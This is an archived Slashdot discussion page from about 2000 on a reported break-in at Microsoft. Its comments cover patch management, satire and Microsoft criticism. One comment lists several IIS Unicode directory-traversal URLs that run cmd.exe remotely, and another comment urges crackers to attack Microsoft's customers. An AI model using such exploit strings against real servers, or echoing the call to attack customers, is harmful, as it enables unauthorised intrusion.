Slashdot Mirror

← Back to Stories (view on slashdot.org)

Microsoft Cracked again?

Posted by ryuzaki0 on from the isn't-that-special dept.

Dominic writes: "Seems microsoft have been hacked (possibly) again, acording to infoworld." They don't seem to have a lot of evidence, but there's some interesting commentary related to this, and the earlier crack where the source code to Windows and Office was supposedly stolen (I'll believe that when I see it).

19 of 185 comments (clear)

  1. Cracking Microsoft is a bad idea. by paai · · Score: 5

    What I do not understand is why so many people try to crack Microsoft itself. Yes, sure, you wave your manhood for everybody to admire its size, but...
    ... in the meantime you help actively to make the Microsoft-site the best-protected site in the world. Do you want that?
    So mess with the customers of Microsoft as much as you want, embarass them for the whole world, but leave Microsoft itself alone! There may come a time when it is desperately necessary to break into the Microsoft stronghold and *then* you want all those exploits wide open; not plugged.

  2. Re:Cracking web sites by pirodude · · Score: 3

    Most sites are cracked by exploting a script (perl, c, php) that resides on the server. And sometimes there is just human error, like forgetting to change a default password (*cough* slashdot *cough*)

  3. Hmmmm by kodiar · · Score: 3

    From a local paper:
    A ... network security consultant and expert on hackers, said that if a copy of the code was downloaded, the person who seized it may demand a ransom for its safe return. Or if the attacker was an "open-source vigilante," the hacker might release it on the Internet for everyone to enjoy. "They believe information wants to be free," he said. "And that Microsoft is the big, evil empire."

  4. Patches and Absolute Certainty by Lostman · · Score: 4

    "It's hard to give you an absolute certainty that the patch had been applied across the board. Given today's incident, our security teams are going back to check out the systems."

    This statement is particularly disheartening. When the problems with Microsoft Outlook Express and the "features" that allow virus's to spread have their only fix with these Patches, and that -- according to even Microsoft -- its hard to make sure that the patches our applied completely: we should worry.

    One might say that the little Microsoft Accessories should have been coded correctly the first time (before being published) but that is often a very hard thing to do.

    I am asking You All: What ways could we make sure that "patches" had been applied across the board?

    1. Re:Patches and Absolute Certainty by IO+ERROR · · Score: 3
      I am asking You All: What ways could we make sure that "patches" had been applied across the board?

      Tivoli for Linux (yes, it exists The Red Hat Update Agent (up2date) (when it works).

      A clueful admin.

      A clueful CIO.
      ---

      --
      How am I supposed to fit a pithy, relevant quote into 120 characters?
  5. there will be a break-in before every new release by Bad_CRC · · Score: 3
    so Microsoft can claim any bugs were maliciously inserted by evil linux hackers who cracked into the network.

    ________

  6. Re:Which server by ryanr · · Score: 4

    I was given a copy of a small log that Dimitri shared with the IDG reporter. Egg.microsoft.com was not one of the servers mentioned.

    And yes, the exploit was nearly identical to one of the lines you mentioned above.

    (The IDG reporter said I couldn't share the log, sorry. Though it's possible that restriction might be gone now that the story has been published. The Infoworld story is a reprint of the IDG story that broke on Friday. Strangely enough, I didn't actually say the first sentence attributed to me in the article.)

  7. You better not see it... by Cid+Highwind · · Score: 5

    ...source code to Windows and Office was supposedly stolen (I'll believe that when I see it)

    Unfortunately, persuant to subparagraph J of section 3, chapter 13 of the Microsoft end-user license agreement (EULA), Microsoft reserves the right to terminate any user who comes in contact with the Windows source code.

    If you do recieve the code via email or any other means, you are required to unplug your computer, telephone, and television, close your eyes, cover your ears, and chant "la la la, I can't hear you". Failure to comply with these provisions that protect our intellectual property is a violation of the DMCA, and will result in the MS Death-Commando(tm) being dispatched to your location.

    We reserve the right to take legal action against anyone who has seen the aforementioned code, anyone who assisted in the theft of the code, anyone who made funny remarks about our IP protection measures, and anyone who found said illegal statements humourous. Stop lauging, we mean it

    --
    0 1 - just my two bits
  8. Re:ummm.... by xinit · · Score: 4
    How's this for a conspiracy theory;

    Monday November 27, 9:00 am Eastern Time

    Press Release

    Microsoft Eliminates Security Problems related to Linux 'Hacker OS'

    Redmond, Wa--(BUSINESS WIRE)--Nov. 27, 2000--Microsoft Corp. (Nasdaq NMS: MSFT) today announced that it has discovered the reasons behind the recent web breakins that have plagued them, and since eliminated them.

    "We have been working for the past month performing an audit of all of our systems that could have been the source of the leak. We found that one of our corporate file servers had been replaced with one of those Linux boxes running Samba. Someone in our intranet development team thought that it would be a good way to keep his budget in line. Well, he knows better now, introducing an insecure free 'operating system' like that in our network - it's a career limiting move." stated Phil Todd, PR spokesperson for Microsoft.

    Phil goes on to describe how a malicious hacker was able to remotely cause the source code in the Linux Computer to send him the Confidential Windows Source Code (tm). Linux 'Kernel Hackers' as they call themselves often do this kind of modification in order to make corporate firewalls useless. "You just never know what is in those free systems. There's nobody you can sue if things go wrong!" Phil added incredulously.

    Microsoft has since removed the offensive machine and replaced it with a Real Windows 2000 File Server. "Sure, some people say it's slower this way, but they're just misinformed. At least it's SECURE."

    About Microsoft

    Founded in 1975, Microsoft (Nasdaq ``MSFT'') is the worldwide leader in software for personal computers and business computing. The company offers a wide range of products and services designed to empower people through great software -- any time, any place and on any device. Microsoft is a registered trademark of Microsoft Corp. in the United States and/or other countries. Other product and company names herein may be trademarks of their respective owners.

    --
    --- http://foo.ca
  9. Microsoft's Servers != Microsoft Windows by xee · · Score: 5

    Notice how no news agency that has reported the recent cracks has equated the security flaws in Microsoft's network and servers to Microsft's Windows operating system. No news agency is suggesting that "if you use windows, you could be next", as they often do with other reports. "Man dead after drinking poisoned orange juice... Find out if your orange juice could be poisoned - tonight at 10." Why is it that the news media is not running their usual tricks to scare the populus. In my (not ever humble) opinion, everyone running Windows is running the risk of their network/servers being cracked.


    -------

    --
    Oh shit! I forgot to click "Post Anonymously"...
  10. In other news... by zelyan · · Score: 5
    And in other news today, a politician lied, astronomers discovered an asteroid that has a 1000-to-1 chance of hitting Earth, and the Napster suit is still ongoing. Industry experts expect that the stock market will continue existing and the dot-coms "might go up, might go down, nobody really knows why they do anything, anyway" said one macro economist.

    President Clinton could not be reached for comment, but Governor and Presidential candidate George W. Bush said "that's the way the cookie jar crumbles." No, we don't know what he was talking about either.

    Jeff

  11. Don't get too proud by flikx · · Score: 3

    MS server software is, out of the box, full of security holes and downright dangerous to put on the Net without extensively patching them first, and

    In the past, I had to keep up on patching default Mandrake Linux 7.0 installs just to make sure that I didn't get owned by a wu-ftpd site-exec kiddie. Installing any OS requires keeping on top of things when you admin a server(s)... Micro$~1 makes sure that you have more to do to keep your servers "secure"

    First thing I do after installing any Os is find any security info I can and apply the related fixes.

    --
    One future, two choices. Oppose them or let them destroy us.
  12. Which server by x-empt · · Score: 5

    I am willing to bet this "hacker" owned egg.microsoft.com, which was not patched. It took them a few days to take it down and it still is offline.

    He was not a "hacker" he just created one of the unicode urls that got parsed incorrectly by IIS. No skill.

    http://target/scripts/..%c1%1c../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c0%9v../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c0%af../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c0%qf../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c1%8s../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c1%9c../winnt/system32/ cmd.exe?/c+dir
    http://target/scripts/..%c1%pc../winnt/system32/ cmd.exe?/c+dir

    Ok, now kids, don't go owning any banks running IIS today (Most are not patched)!

    --
    Ever need an online dictionary?
  13. MS Windows - a toy Operating System by roman_mir · · Score: 3

    Steve Mann who is a prof at UofT (Toronto) teaches hardware engineering and wearable computers noted that any MS Windows is a toy operating system. The guy only deals with Unix though.

    --
    You can't handle the truth.
  14. Guess I'm not an 31337 h4x0r after all. by e_n_d_o · · Score: 3

    I tried this exploit against one of MY OWN MACHINES. As in, a machine that is owned by me, on which I already know the Admin password etc.

    The first thing I tried was the cmd.exe /c dir command like x-empt suggested and the result was the expected.

    Then I pcanywhered in and decided to see if I remote launched notepad if it would appear on the display. When notepad.exe was launched, the whole system crumbled. I tried to kill it, but it won't die. Task Manager just says "Access Denied". Geez, where's kill -9 when you need it. I'm even logged in as admin. I can't kill the process, and I can't start anything except task manager. Can't even launch the services panel to kill IIS.

    So now I'm attempting the tried and true method of fixing a win box.

  15. Script-kiddies and car-thieves by mangu · · Score: 4
    Following a simple analogy to your reasoning, if no car manufacturer ever publishes their design details, how do criminals find out how to start the engine without the key? Simply put, it takes an engineer to design something, but any punk can find out a way to break things.

    You are assuming script-kiddies need the source code to find out vulnerabilities in software, but the truth is, if they were able to understand the design intrincacies of software they would not be script-kiddies.

    Believe me, for those of us who are competent enough to choose between building or destroying, it's much more rewarding to be creative.

  16. M$ Bashing. by Bender+Unit+22 · · Score: 3

    We all know that most people here on ./ enjoys a good M$ bashing when they get the chance. Sometimes the subject are a bit questionable and not really good material for it. But if the article are correct, then they have really asked for it this time.
    Now for mine. A company that size with so many users depending on them, have a huge reasonability in keeping this from not happening. When it happened the first time, they should have the resources to make sure that it doesn't happen again. Don't tell me they can't divert the manpower needed to solve this. Let's see the list of posts grow as usual, can we go past 500. :-)
    [extreme bashing on]If they cant secure their own network based on their own products who can.[extreme bashing off]. ah felt good. :-)
    But somehow I doubt that it will affect anyone's decision about running their software. No impact at boss level, I'm afraid.
    --------

  17. Big deal by Anonymous Coward · · Score: 4

    I haxored kernel.org and downloaded the linux source code

  18. MS Servers by Anonymous Coward · · Score: 5
    I love it, I absolutely love it. Sys admins are always being told that it's their fault for being hacked because they hadn't kept up on the latest patches. Now MS is whining and complaining that it's too hard to apply all those patches to all those servers. The message I'm getting is this:

    1) MS server software is, out of the box, full of security holes and downright dangerous to put on the Net without extensively patching them first, and

    2) Patching them won't even help you, because there are too many patches and too many holes. So many, in fact, that even MS can't keep up with them, even though the patches are developed and tested in the same building.

    Did I miss anything?